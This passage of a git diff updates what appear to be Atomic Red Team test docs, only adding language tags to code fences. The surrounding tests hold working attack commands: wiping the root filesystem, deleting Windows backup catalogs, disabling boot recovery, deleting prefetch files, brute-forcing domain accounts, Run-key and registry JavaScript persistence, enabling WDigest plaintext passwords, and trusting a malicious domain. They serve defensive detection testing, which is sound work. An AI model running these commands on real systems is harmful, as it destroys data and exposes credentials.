Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd bcdedit /set {default} bootstatuspolicy ignoreallfailures bcdedit /set {default} recoveryenabled no ``` @@ -270,7 +290,9 @@ This test deletes Windows Backup catalogs. #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd wbadmin delete catalog -quiet ``` @@ -290,7 +312,9 @@ This test deletes the entire root filesystem of a Linux system. This technique w #### Attack Commands: Run with `bash`! -``` + + +```bash rm -rf / --no-preserve-root > /dev/null 2> /dev/null ``` @@ -310,7 +334,9 @@ Delete a single prefetch file. Deletion of prefetch files is a known anti-foren #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0]) ``` @@ -333,7 +359,9 @@ https://twitter.com/SBousseaden/status/1197524463304290305?s=20 #### Attack Commands: Run with `powershell`! -``` + + +```powershell if ($env:os -eq "Windows_NT") { New-Item $env:TEMP\TeamViewer_54.log Remove-Item $env:TEMP\TeamViewer_54.log diff --git a/atomics/T1110/T1110.md b/atomics/T1110/T1110.md index 8e501aa0..4d76637e 100644 --- a/atomics/T1110/T1110.md +++ b/atomics/T1110/T1110.md @@ -51,7 +51,9 @@ Creates username and password files then attempts to brute force on remote host #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd net user /domain > #{input_file_users} echo "Password1" >> #{input_file_passwords} echo "1q2w3e4r" >> #{input_file_passwords} diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md index 69ef8b02..241b152a 100644 --- a/atomics/T1112/T1112.md +++ b/atomics/T1112/T1112.md @@ -35,12 +35,14 @@ Modify the registry of the currently logged in user using reg.exe cia cmd consol #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f ``` #### Cleanup Commands: -``` +```cmd reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f ``` @@ -60,12 +62,14 @@ CMD is ran as Administrative rights. #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f ``` #### Cleanup Commands: -``` +```cmd reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f ``` @@ -84,7 +88,9 @@ Modify a registry key of each user profile not currently loaded on the machine u #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell # here is an example of using the same method of reg load, but without the New-PSDrive cmdlet. # Here we can load all unloaded user hives and do whatever we want in the location below (comments) $PatternSID = 'S-1-5-21-\d+-\d+\-\d+\-\d+$' @@ -155,12 +161,14 @@ Sets registry key that will tell windows to store plaintext passwords (making th #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f ``` #### Cleanup Commands: -``` +```cmd reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f ``` @@ -186,7 +194,9 @@ Sets Windows Registry key containing base64-encoded PowerShell code. #### Attack Commands: Run with `powershell`! -``` + + +```powershell $OriginalCommand = '#{powershell_command}' $Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand) $EncodedCommand =[Convert]::ToBase64String($Bytes) @@ -195,7 +205,7 @@ Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_sto ``` #### Cleanup Commands: -``` +```powershell Remove-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -ErrorAction Ignore ``` @@ -215,7 +225,9 @@ https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterpris #### Attack Commands: Run with `powershell`! -``` + + +```powershell $key= "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\" $name ="bad-subdomain" new-item $key -Name $name -Force @@ -225,7 +237,7 @@ new-itemproperty $key$name -Name * -Value 2 -Type DWORD; ``` #### Cleanup Commands: -``` +```powershell $key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\" Remove-item $key -Recurse -ErrorAction Ignore ``` @@ -245,12 +257,14 @@ placing javascript in registry for persistence #### Attack Commands: Run with `powershell`! -``` + + +```powershell New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -Value "